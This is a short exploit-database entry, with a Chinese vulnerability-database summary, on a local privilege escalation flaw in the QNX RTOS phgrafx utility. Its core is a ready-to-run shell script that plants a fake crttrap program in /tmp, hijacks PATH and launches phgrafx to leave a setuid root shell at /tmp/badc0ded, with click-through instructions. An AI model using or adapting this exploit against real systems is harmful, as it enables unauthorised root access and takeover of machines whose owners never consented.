https://www.exploit-db.com/exploits/21503
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-857

QNXrealtimeoperatingsystem(RTOS)4.25和6.1.0版本中(1)phrafx和(2)phgrafx-startup程序在执行系统命令之前不能正确降低特权。本地用户通过修改PATH环境变量来引用恶意crttrap程序导致执行任意命令。

source: http://www.securityfocus.com/bid/4915/info

The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges.

#!/bin/sh
#
# click advanced,done, apply, accept and done. 
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo "#!/bin/sh" > /tmp/crttrap
echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
echo "/usr/bin/crttrap $1 $2 $3 $4 $5 $6 $7 $8 $9 " >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/bin/phgrafx

来源:BID
名称:4916
链接:http://www.securityfocus.com/bid/4916
来源:BID
名称:4915
链接:http://www.securityfocus.com/bid/4915
来源:XF
名称:qnx-rtos-phgrafx-privileges(9257)
链接:http://www.iss.net/security_center/static/9257.php